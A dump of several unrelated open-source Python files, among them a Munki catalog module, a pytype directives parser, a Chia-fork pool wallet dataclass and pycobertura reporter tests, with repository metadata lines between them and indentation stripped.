# items that are either partially or entirely installed
allotherpkgs = []
for othername in installed:
allotherpkgs.extend(installedpkgsmatchedtoname[othername])
for othername in partiallyinstalled:
if othername != name:
allotherpkgs.extend(installedpkgsmatchedtoname[othername])
# use Python sets to find pkgs that are unique to this name
uniquepkgs = list(set(pkgsforthisname) - set(allotherpkgs))
if uniquepkgs:
installed.append(name)
# now filter partiallyinstalled to remove those items we moved to installed
partiallyinstalled = [item for item in partiallyinstalled
if item not in installed]
# build our reference table. For each item we think is installed,
# record the receipts on disk matched to the item
references = {}
for name in installed:
for pkgid in installedpkgsmatchedtoname[name]:
if not pkgid in references:
references[pkgid] = []
references[pkgid].append(name)
# look through all our installedpkgs, looking for ones that have not been
# attached to any Munki names yet
orphans = [pkgid for pkgid in installedpkgs if pkgid not in references]
# attempt to match orphans to Munki item names
matched_orphans = []
for pkgid in orphans:
if pkgid in pkgid_to_itemname:
installed_pkgid_version = installedpkgs[pkgid]
possible_match_items = pkgid_to_itemname[pkgid]
best_match = best_version_match(
installed_pkgid_version, possible_match_items)
if best_match:
matched_orphans.append(best_match)
# process matched_orphans
for name in matched_orphans:
if name not in installed:
installed.append(name)
if name in partiallyinstalled:
partiallyinstalled.remove(name)
for pkgid in installedpkgsmatchedtoname[name]:
if not pkgid in references:
references[pkgid] = []
if not name in references[pkgid]:
references[pkgid].append(name)
pkgdata['receipts_for_name'] = installedpkgsmatchedtoname
pkgdata['installed_names'] = installed
pkgdata['pkg_references'] = references
# left here for future debugging/testing use....
#pkgdata['itemname_to_pkgid'] = itemname_to_pkgid
#pkgdata['pkgid_to_itemname'] = pkgid_to_itemname
#pkgdata['partiallyinstalled_names'] = partiallyinstalled
#pkgdata['orphans'] = orphans
#pkgdata['matched_orphans'] = matched_orphans
#ManagedInstallDir = prefs.pref('ManagedInstallDir')
#pkgdatapath = os.path.join(ManagedInstallDir, 'PackageData.plist')
#try:
# FoundationPlist.writePlist(pkgdata, pkgdatapath)
#except FoundationPlist.NSPropertyListWriteException:
# pass
#catalogdbpath = os.path.join(ManagedInstallDir, 'CatalogDB.plist')
#try:
# FoundationPlist.writePlist(CATALOG, catalogdbpath)
#except FoundationPlist.NSPropertyListWriteException:
# pass
return pkgdata
def get_item_detail(name, cataloglist, vers='',
skip_min_os_check=False, suppress_warnings=False):
"""Searches the catalogs in list for an item matching the given name that
can be installed on the current hardware/OS (optionally skipping the
minimum OS check so we can return an item that requires a higher OS)
If no version is supplied, but the version is appended to the name
('TextWrangler--2.3.0.0.0') that version is used.
If no version is given at all, the latest version is assumed.
Returns a pkginfo item, or None.
"""
rejected_items = []
machine = info.getMachineFacts()
# condition check functions
def munki_version_ok(item):
'''Returns a boolean to indicate if the current Munki version is high
enough to install this item. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('minimum_munki_version'):
min_munki_vers = item['minimum_munki_version']
display.display_debug1(
'Considering item %s, version %s '
'with minimum Munki version required %s',
item['name'], item['version'], min_munki_vers)
display.display_debug1(
'Our Munki version is %s', machine['munki_version'])
if (pkgutils.MunkiLooseVersion(machine['munki_version'])
< pkgutils.MunkiLooseVersion(min_munki_vers)):
reason = (
'Rejected item %s, version %s with minimum Munki version '
'required %s. Our Munki version is %s.'
% (item['name'], item['version'],
item['minimum_munki_version'], machine['munki_version']))
rejected_items.append(reason)
return False
return True
def os_version_ok(item, skip_min_os_check=False):
'''Returns a boolean to indicate if the item is ok to install under
the current OS. If not, also adds the failure reason to the
rejected_items list. If skip_min_os_check is True, skips the minimum os
version check.'''
# Is the current OS version >= minimum_os_version for the item?
if item.get('minimum_os_version') and not skip_min_os_check:
min_os_vers = item['minimum_os_version']
display.display_debug1(
'Considering item %s, version %s '
'with minimum os version required %s',
item['name'], item['version'], min_os_vers)
display.display_debug1(
'Our OS version is %s', machine['os_vers'])
if (pkgutils.MunkiLooseVersion(machine['os_vers']) <
pkgutils.MunkiLooseVersion(min_os_vers)):
# skip this one, go to the next
reason = (
'Rejected item %s, version %s with minimum os version '
'required %s. Our OS version is %s.'
% (item['name'], item['version'],
item['minimum_os_version'], machine['os_vers']))
rejected_items.append(reason)
return False
# current OS version <= maximum_os_version?
if item.get('maximum_os_version'):
max_os_vers = item['maximum_os_version']
display.display_debug1(
'Considering item %s, version %s '
'with maximum os version supported %s',
item['name'], item['version'], max_os_vers)
display.display_debug1(
'Our OS version is %s', machine['os_vers'])
if (pkgutils.MunkiLooseVersion(machine['os_vers']) >
pkgutils.MunkiLooseVersion(max_os_vers)):
# skip this one, go to the next
reason = (
'Rejected item %s, version %s with maximum os version '
'required %s. Our OS version is %s.'
% (item['name'], item['version'],
item['maximum_os_version'], machine['os_vers']))
rejected_items.append(reason)
return False
return True
def cpu_arch_ok(item):
'''Returns a boolean to indicate if the item is ok to install under
the current CPU architecture. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('supported_architectures'):
display.display_debug1(
'Considering item %s, version %s '
'with supported architectures: %s',
item['name'], item['version'], item['supported_architectures'])
display.display_debug1(
'Our architecture is %s', machine['arch'])
if machine['arch'] in item['supported_architectures']:
return True
if ('x86_64' in item['supported_architectures'] and
machine['arch'] == 'i386' and
machine['x86_64_capable'] is True):
return True
# we didn't find a supported architecture that
# matches this machine
reason = (
'Rejected item %s, version %s with supported architectures: '
'%s. Our architecture is %s.'
% (item['name'], item['version'],
item['supported_architectures'], machine['arch']))
rejected_items.append(reason)
return False
return True
def installable_condition_ok(item):
'''Returns a boolean to indicate if an installable_condition predicate
in the current item passes. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('installable_condition'):
if not info.predicate_evaluates_as_true(
item['installable_condition']):
rejected_items.append(
'Rejected item %s, version %s with installable_condition: '
'%s.' % (item['name'], item['version'],
item['installable_condition']))
return False
return True
if vers == 'apple_update_metadata':
vers = 'latest'
else:
(name, includedversion) = split_name_and_version(name)
if includedversion and vers == '':
vers = includedversion
if vers:
vers = pkgutils.trim_version_string(vers)
else:
vers = 'latest'
if skip_min_os_check:
display.display_debug1(
'Looking for detail for: %s, version %s, '
'ignoring minimum_os_version...', name, vers)
else:
display.display_debug1(
'Looking for detail for: %s, version %s...', name, vers)
for catalogname in cataloglist:
# is name in the catalog?
if catalogname in _CATALOG and name in _CATALOG[catalogname]['named']:
itemsmatchingname = _CATALOG[catalogname]['named'][name]
indexlist = []
if vers == 'latest':
# order all our items, highest version first
versionlist = list(itemsmatchingname.keys())
versionlist.sort(key=pkgutils.MunkiLooseVersion, reverse=True)
for versionkey in versionlist:
indexlist.extend(itemsmatchingname[versionkey])
elif vers in list(itemsmatchingname.keys()):
# get the specific requested version
indexlist = itemsmatchingname[vers]
if indexlist:
display.display_debug1(
'Considering %s items with name %s from catalog %s' %
(len(indexlist), name, catalogname))
for index in indexlist:
# iterate through list of items with matching name, highest
# version first, looking for first one that passes all the
# conditional tests (if any)
item = _CATALOG[catalogname]['items'][index]
if (munki_version_ok(item) and
os_version_ok(item,
skip_min_os_check=skip_min_os_check) and
cpu_arch_ok(item) and
installable_condition_ok(item)):
display.display_debug1(
'Found %s, version %s in catalog %s',
item['name'], item['version'], catalogname)
return item
# if we got this far, we didn't find it.
display.display_debug1('Not found')
for reason in rejected_items:
if suppress_warnings:
display.display_debug1(reason)
else:
display.display_warning(reason)
return None
# global to hold our catalog DBs
_CATALOG = {}
def get_catalogs(cataloglist):
"""Retrieves the catalogs from the server and populates our catalogs
dictionary.
"""
#global _CATALOG
for catalogname in cataloglist:
if not catalogname in _CATALOG:
catalogpath = download.download_catalog(catalogname)
if catalogpath:
try:
catalogdata = FoundationPlist.readPlist(catalogpath)
except FoundationPlist.NSPropertyListSerializationException:
display.display_error(
'Retrieved catalog %s is invalid.', catalogname)
try:
os.unlink(catalogpath)
except (OSError, IOError):
pass
else:
_CATALOG[catalogname] = make_catalog_db(catalogdata)
def clean_up():
"""Removes any catalog files that are no longer in use by this client"""
catalog_dir = os.path.join(prefs.pref('ManagedInstallDir'),
'catalogs')
for item in os.listdir(catalog_dir):
if item not in _CATALOG:
os.unlink(os.path.join(catalog_dir, item))
def catalogs():
'''Returns our internal _CATALOG dict'''
return _CATALOG
if __name__ == '__main__':
print('This is a library of support tools for the Munki Suite.')
| 40.826893 | 80 | 0.617831 | [
"Apache-2.0"
] | Artoria2e5/munki | code/client/munkilib/updatecheck/catalogs.py | 26,415 | Python |
#--- Exercício 1 - Funções - 1
#--- Escreva uma função que imprima um cabeçalho
#--- O cabeçalho deve ser escrito usando a multiplicação de carácter
#--- resultado esperado: -------------- Cadastro Serasa --------------------------
#--- O cabeçalho deve conter o nome de uma empresa, que será uma variável
#--- Realize a chamada da função na ultima linha do seu programa
nome_empresa = input("Insira o nome da empresa: ")
def imprimir_cabecalho():
print("-" *10 , "Cadastro", nome_empresa, "-" *10 )
imprimir_cabecalho() | 40.769231 | 82 | 0.658491 | [
"MIT"
] | AmandaRH07/Entra21_Python | 01-Exercicios/Aula007/Ex1.py | 545 | Python |
# coding=utf-8
from typing import Iterable
from .registry import registry
@registry.register("A000073")
def tribonacci() -> Iterable[int]:
"""Tribonacci numbers."""
yield 0
yield 0
yield 1
p3: int = 0 # tribonacci(0)
p2: int = 0 # tribonacci(1)
p1: int = 1 # tribonacci(2)
while True:
curr: int = p1 + p2 + p3
yield curr
p1, p2, p3 = curr, p1, p2
| 20.45 | 34 | 0.581907 | [
"MIT"
] | reidhoch/oeis-seq | oeis/tribonacci.py | 409 | Python |
from dataclasses import dataclass
from enum import IntEnum
from typing import Optional, Dict
from blspy import G1Element
from wheat.protocols.pool_protocol import POOL_PROTOCOL_VERSION
from wheat.types.blockchain_format.coin import Coin
from wheat.types.blockchain_format.program import Program
from wheat.types.blockchain_format.sized_bytes import bytes32
from wheat.util.byte_types import hexstr_to_bytes
from wheat.util.ints import uint32, uint8
from wheat.util.streamable import streamable, Streamable
class PoolSingletonState(IntEnum):
"""
From the user's point of view, a pool group can be in these states:
`SELF_POOLING`: The singleton exists on the blockchain, and we are farming
block rewards to a wallet address controlled by the user
`LEAVING_POOL`: The singleton exists, and we have entered the "escaping" state, which
means we are waiting for a number of blocks = `relative_lock_height` to pass, so we can leave.
`FARMING_TO_POOL`: The singleton exists, and it is assigned to a pool.
`CLAIMING_SELF_POOLED_REWARDS`: We have submitted a transaction to sweep our
self-pooled funds.
"""
SELF_POOLING = 1
LEAVING_POOL = 2
FARMING_TO_POOL = 3
SELF_POOLING = PoolSingletonState.SELF_POOLING
LEAVING_POOL = PoolSingletonState.LEAVING_POOL
FARMING_TO_POOL = PoolSingletonState.FARMING_TO_POOL
@dataclass(frozen=True)
@streamable
class PoolState(Streamable):
"""
`PoolState` is a type that is serialized to the blockchain to track the state of the user's pool singleton
`target_puzzle_hash` is either the pool address, or the self-pooling address that pool rewards will be paid to.
`target_puzzle_hash` is NOT the p2_singleton puzzle that block rewards are sent to.
The `p2_singleton` address is the initial address, and the `target_puzzle_hash` is the final destination.
`relative_lock_height` is zero when in SELF_POOLING state
"""
version: uint8
state: uint8 # PoolSingletonState
# `target_puzzle_hash`: A puzzle_hash we pay to
# When self-farming, this is a main wallet address
# When farming-to-pool, the pool sends this to the farmer during pool protocol setup
target_puzzle_hash: bytes32 # TODO: rename target_puzzle_hash -> pay_to_address
# owner_pubkey is set by the wallet, once
owner_pubkey: G1Element
pool_url: Optional[str]
relative_lock_height: uint32
def initial_pool_state_from_dict(state_dict: Dict, owner_pubkey: G1Element, owner_puzzle_hash: bytes32) -> PoolState:
state_str = state_dict["state"]
singleton_state: PoolSingletonState = PoolSingletonState[state_str]
if singleton_state == SELF_POOLING:
target_puzzle_hash = owner_puzzle_hash
pool_url: str = ""
relative_lock_height = uint32(0)
elif singleton_state == FARMING_TO_POOL:
target_puzzle_hash = bytes32(hexstr_to_bytes(state_dict["target_puzzle_hash"]))
pool_url = state_dict["pool_url"]
relative_lock_height = uint32(state_dict["relative_lock_height"])
else:
raise ValueError("Initial state must be SELF_POOLING or FARMING_TO_POOL")
# TODO: change create_pool_state to return error messages, as well
assert relative_lock_height is not None
return create_pool_state(singleton_state, target_puzzle_hash, owner_pubkey, pool_url, relative_lock_height)
def create_pool_state(
state: PoolSingletonState,
target_puzzle_hash: bytes32,
owner_pubkey: G1Element,
pool_url: Optional[str],
relative_lock_height: uint32,
) -> PoolState:
if state not in set(s.value for s in PoolSingletonState):
raise AssertionError("state {state} is not a valid PoolSingletonState,")
ps = PoolState(
POOL_PROTOCOL_VERSION, uint8(state), target_puzzle_hash, owner_pubkey, pool_url, relative_lock_height
)
# TODO Move verify here
return ps
@dataclass(frozen=True)
@streamable
class PoolWalletInfo(Streamable):
"""
Internal Pool Wallet state, not destined for the blockchain. This can be completely derived with
the Singleton's CoinSolutions list, or with the information from the WalletPoolStore.
"""
current: PoolState
target: Optional[PoolState]
launcher_coin: Coin
launcher_id: bytes32
p2_singleton_puzzle_hash: bytes32
current_inner: Program # Inner puzzle in current singleton, not revealed yet
tip_singleton_coin_id: bytes32
singleton_block_height: uint32 # Block height that current PoolState is from
| 38.87069 | 117 | 0.758261 | [
"Apache-2.0"
] | Jsewill/wheat-blockchain | wheat/pools/pool_wallet_info.py | 4,509 | Python |
# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2022 Jeff Epler for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
# On an Adafruit Feather M4 or Adafruit Feather RP2040 with Floppy Featherwing,
# do some track-to-track seeking and flux reading.
import board
import adafruit_floppy
D24 = getattr(board, "D24") or getattr(board, "A4")
D25 = getattr(board, "D25") or getattr(board, "A5")
floppy = adafruit_floppy.MFMFloppy(
densitypin=board.A0,
indexpin=board.A1,
selectpin=board.A2,
motorpin=board.A3,
directionpin=D24,
steppin=D25,
track0pin=board.D11,
protectpin=board.D10,
rddatapin=board.D9,
sidepin=board.D6,
readypin=board.D5,
)
floppy.selected = True
floppy.spin = True
print("Seek track 8")
floppy.track = 8
print("Seek track 0")
floppy.track = 0
print("Read partial track raw flux data")
buf = bytearray(30000)
n_read = floppy.flux_readinto(buf)
print("read", n_read)
buckets = [0] * 256
for b in buf:
buckets[b] += 1
oi = -1
for i, bi in enumerate(buckets):
if bi > 0:
if i != oi + 1:
print("---")
oi = i
print(f"{i:3} {bi:5}")
| 24.77551 | 79 | 0.682043 | [
"MIT"
] | jepler/Adafruit_CircuitPython_floppy | examples/floppy_simpletest.py | 1,214 | Python |
"""Code and data structures for managing source directives."""
import bisect
import collections
import re
import sys
import tokenize
from pytype import utils
from six import moves
_DIRECTIVE_RE = re.compile(r"#\s*(pytype|type)\s*:\s?([^#]*)")
_CLOSING_BRACKETS_RE = re.compile(r"^(\s*[]})]\s*)+(#.*)?$")
_WHITESPACE_RE = re.compile(r"^\s*(#.*)?$")
_CLASS_OR_FUNC_RE = re.compile(r"^(def|class)\s")
_DOCSTRING_RE = re.compile(r"^\s*(\"\"\"|''')")
_ALL_ERRORS = "*" # Wildcard for disabling all errors.
class _DirectiveError(Exception):
pass
class SkipFile(Exception):
"""Exception thrown if we encounter "pytype: skip-file" in the source code."""
class _LineSet(object):
"""A set of line numbers.
The data structure is optimized to represent the union of a sparse set
of integers and ranges of non-negative integers. This supports the two styles
of directives: those after a statement apply only to that line and those on
their own line apply until countered by the opposing directive.
"""
def __init__(self):
# Map of line->bool for specific lines, takes precedence over _transitions.
self._lines = {}
# A sorted list of the lines at which the range state changes
# polarity. It is assumed to initially be false (not in a range).
# Even positions represent the start of a range, odd positions represent
# the end of a range. Thus [2, 5, 10, 12] would include lines 2, 3, 4, 10,
# and 11. If the length is odd, then an end of maxint is implied, thus
# [2, 5, 10] would disable lines 2, 3, 4, 10, 11, 12, ...
self._transitions = []
def set_line(self, line, membership):
"""Set whether a given line is a member of the set."""
self._lines[line] = membership
def start_range(self, line, membership):
"""Start a range of lines that are either included/excluded from the set.
Args:
line: A line number.
membership: If True, lines >= line are included in the set (starting
a range), otherwise they are excluded (ending a range).
Raises:
ValueError: if line is less than that of a previous call to start_range().
"""
last = self._transitions[-1] if self._transitions else -1
# Assert that lines are monotonically increasing. This simplifies the
# logic of adding new lines and ensures that _ranges is sorted.
if line < last:
raise ValueError("Line number less than previous start_range() call.")
# Determine previous membership state (True if the last range has an
# indefinite end).
previous = (len(self._transitions) % 2) == 1
if membership == previous:
# TODO(dbaum): Consider issuing a warning here.
return # Redundant with previous state, do nothing.
elif line == last:
# We have either enable/disable or disable/enable on the same line,
# cancel them out by popping the previous transition.
self._transitions.pop()
else:
# Normal case - add a transition at this line.
self._transitions.append(line)
def __contains__(self, line):
"""Return if a line is a member of the set."""
# First check for an entry in _lines.
specific = self._lines.get(line)
if specific is not None:
return specific
# Find the position in _ranges for line. The polarity of this position
# determines whether we are inside a range (odd) or outside (even).
pos = bisect.bisect(self._transitions, line)
return (pos % 2) == 1
def get_disable_after(self, lineno):
"""Get an unclosed disable, if any, that starts after lineno."""
if len(self._transitions) % 2 == 1 and self._transitions[-1] >= lineno:
return self._transitions[-1]
return None
class Director(object):
"""Holds all of the directive information for a source file."""
def __init__(self, src, errorlog, filename, disable):
"""Create a Director for a source file.
Args:
src: The source text as a string.
errorlog: An ErrorLog object. Directive errors will be logged to the
errorlog.
filename: The name of the source file.
disable: List of error messages to always ignore.
"""
self._filename = filename
self._errorlog = errorlog
self._type_comments = {} # Map from line number to (code, comment).
self._docstrings = set() # Start lines of docstrings.
# Lines that have "type: ignore". These will disable all errors, and in
# the future may have other impact (such as not attempting an import).
self._ignore = _LineSet()
# Map from error name to lines for which that error is disabled. Note
# that _ALL_ERRORS is essentially a wildcard name (it matches all names).
self._disables = collections.defaultdict(_LineSet)
# Apply global disable, from the command line arguments:
for error_name in disable:
self._disables[error_name].start_range(0, True)
# Parse the source code for directives.
self._parse_source(src)
@property
def type_comments(self):
return self._type_comments
@property
def docstrings(self):
return sorted(self._docstrings)
@property
def ignore(self):
return self._ignore
def _adjust_type_comments(self, closing_bracket_lines, whitespace_lines):
"""Adjust any type comments affected by closing bracket lines.
Lines that contain nothing but closing brackets don't appear in the
bytecode, so for, e.g.,
v = [
"hello",
"world",
] # line 4
line 4 is where any type comment for 'v' should be put, but the
STORE_NAME opcode for 'v' is at line 3. If we find a type comment put
(wrongly) on line 3, we'll report an error, and if we find a type comment
on line 4, we'll move it to line 3.
Args:
closing_bracket_lines: A set of lines containing only closing brackets,
to be used for adjusting affected type comments.
whitespace_lines: A set of lines containing only whitespace. Its union
with closing_bracket_lines is a set of consecutive lines.
"""
target = min(closing_bracket_lines | whitespace_lines) - 1
if target in self._type_comments:
self._errorlog.ignored_type_comment(
self._filename, target, self._type_comments[target][1])
del self._type_comments[target]
end = max(closing_bracket_lines)
if end in self._type_comments:
self._type_comments[target] = self._type_comments[end]
del self._type_comments[end]
def _parse_source(self, src):
"""Parse a source file, extracting directives from comments."""
f = moves.StringIO(src)
defs_start = None
closing_bracket_lines = set()
whitespace_lines = set()
for tok, _, start, _, line in tokenize.generate_tokens(f.readline):
lineno, col = start
if defs_start is None and _CLASS_OR_FUNC_RE.match(line):
defs_start = lineno
if _CLOSING_BRACKETS_RE.match(line):
closing_bracket_lines.add(lineno)
elif _WHITESPACE_RE.match(line):
whitespace_lines.add(lineno)
elif _DOCSTRING_RE.match(line):
self._docstrings.add(lineno)
else:
if closing_bracket_lines:
self._adjust_type_comments(closing_bracket_lines, whitespace_lines)
closing_bracket_lines.clear()
whitespace_lines.clear()
if tok == tokenize.COMMENT:
matches = list(_DIRECTIVE_RE.finditer(line[col:]))
is_nested = bool(matches) and matches[0].start(0) > 0
for m in matches:
code = line[:col].strip()
tool, data = m.groups()
open_ended = not code
data = data.strip()
if tool == "type":
self._process_type(lineno, code, data, is_nested)
elif tool == "pytype":
try:
self._process_pytype(lineno, data, open_ended)
except _DirectiveError as e:
self._errorlog.invalid_directive(
self._filename, lineno, utils.message(e))
else:
pass # ignore comments for other tools
if closing_bracket_lines:
self._adjust_type_comments(closing_bracket_lines, whitespace_lines)
if defs_start is not None:
disables = list(self._disables.items())
# Add "# type: ignore" to the list of disables that we check.
disables.append(("Type checking", self._ignore))
for name, lineset in disables:
lineno = lineset.get_disable_after(defs_start)
if lineno is not None:
self._errorlog.late_directive(self._filename, lineno, name)
def _process_type(self, lineno, code, data, is_nested):
"""Process a type: comment."""
# Discard type comments embedded in larger whole-line comments.
if not code and is_nested:
return
if lineno in self._type_comments:
# If we have multiple type comments on the same line, take the last one,
# but add an error to the log.
self._errorlog.invalid_directive(
self._filename, lineno,
"Multiple type comments on the same line.")
if data == "ignore":
if not code:
self._ignore.start_range(lineno, True)
else:
self._ignore.set_line(lineno, True)
else:
self._type_comments[lineno] = (code, data)
def _process_pytype(self, lineno, data, open_ended):
"""Process a pytype: comment."""
if not data:
raise _DirectiveError("Invalid directive syntax.")
for option in data.split():
# Parse the command.
if option == "skip-file":
raise SkipFile()
try:
command, values = option.split("=", 1)
values = values.split(",")
except ValueError:
raise _DirectiveError("Invalid directive syntax.")
# Additional commands may be added in the future. For now, only
# "disable" and "enable" are supported.
if command == "disable":
disable = True
elif command == "enable":
disable = False
else:
raise _DirectiveError("Unknown pytype directive: '%s'" % command)
if not values:
raise _DirectiveError(
"Disable/enable must specify one or more error names.")
for error_name in values:
if (error_name == _ALL_ERRORS or
self._errorlog.is_valid_error_name(error_name)):
lines = self._disables[error_name]
if open_ended:
lines.start_range(lineno, disable)
else:
lines.set_line(lineno, disable)
else:
self._errorlog.invalid_directive(
self._filename, lineno, "Invalid error name: '%s'" % error_name)
def should_report_error(self, error):
"""Return whether the error should be logged.
This method is suitable for use as an error filter.
Args:
error: An error._Error object.
Returns:
True iff the error should be included in the log.
"""
# Always report errors that aren't for this file or do not have a line
# number.
if error.filename != self._filename or error.lineno is None:
return True
# Treat lineno=0 as below the file, so we can filter it.
lineno = error.lineno or sys.maxsize
# Report the error if it isn't subject to any ignore or disable.
return (lineno not in self._ignore and
lineno not in self._disables[_ALL_ERRORS] and
lineno not in self._disables[error.name])
| 38.013468 | 80 | 0.66519 | [
"Apache-2.0"
] | Flameeyes/pytype | pytype/directors.py | 11,290 | Python |
from .utils import make_cobertura
def remove_style_tag(html):
style_pattern_start = '\n <style>'
style_pattern_stop = '\n </style>'
style_starts = html.find(style_pattern_start)
style_stops = html.find(style_pattern_stop) + len(style_pattern_stop)
html_nostyle = html[:style_starts] + html[style_stops:]
return html_nostyle
def test_text_report():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura()
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
------------------------------ ------- ------ ------- ---------
Main.java 11 0 100.00%
search/BinarySearch.java 12 1 91.67% 24
search/ISortedArraySearch.java 0 0 100.00%
search/LinearSearch.java 7 2 71.43% 19-24
TOTAL 30 3 90.00%"""
def test_text_report__with_missing_range():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura('tests/dummy.with-dummy2-no-cov.xml')
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
----------------- ------- ------ ------- ---------
dummy/__init__.py 0 0 0.00%
dummy/dummy.py 4 0 100.00%
dummy/dummy2.py 2 2 0.00% 1-2
TOTAL 6 2 66.67%"""
def test_text_report_delta__no_diff():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source1/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
---------- ------- ------ ------- ---------
TOTAL - - -"""
def test_text_report_delta__colorize_True():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_True__with_missing_range():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_False():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=False)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - -2 +40.00% -5, -6
dummy/dummy2.py +2 +1 -25.00% -2, -4, +5
dummy/dummy3.py +2 +2 - +1, +2
TOTAL +4 +1 +31.06%"""
def test_html_report():
from pycobertura.reporters import HtmlReporter
cobertura = make_cobertura()
report = HtmlReporter(cobertura)
html_output = report.generate()
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#Main.java">Main.java</a></td>
<td>11</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/BinarySearch.java">search/BinarySearch.java</a></td>
<td>12</td>
<td>1</td>
<td>91.67%</td>
<td>24</td>
</tr>
<tr>
<td><a href="#search/ISortedArraySearch.java">search/ISortedArraySearch.java</a></td>
<td>0</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/LinearSearch.java">search/LinearSearch.java</a></td>
<td>7</td>
<td>2</td>
<td>71.43%</td>
<td>19-24</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>30</td>
<td>3</td>
<td>90.00%</td>
<td></td>
</tr>
</tfoot>
</table>
<h4 id="Main.java">Main.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/Main.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/BinarySearch.java">search/BinarySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/BinarySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/ISortedArraySearch.java">search/ISortedArraySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/ISortedArraySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/LinearSearch.java">search/LinearSearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/LinearSearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
def test_text_report_delta__no_source():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, show_source=False)
output = report_delta.generate()
assert output == """\
Filename Stmts Miss Cover
--------------- ------- ------ -------
dummy/dummy.py - -2 +40.00%
dummy/dummy2.py +2 +1 -25.00%
dummy/dummy3.py +2 +2 -
TOTAL +4 +1 +31.06%"""
def test_html_report_delta__no_source():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2, show_source=False)
html_output = report_delta.generate()
assert 'Missing' not in html_output
assert '<h4 id=' not in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
</tr>
<tr>
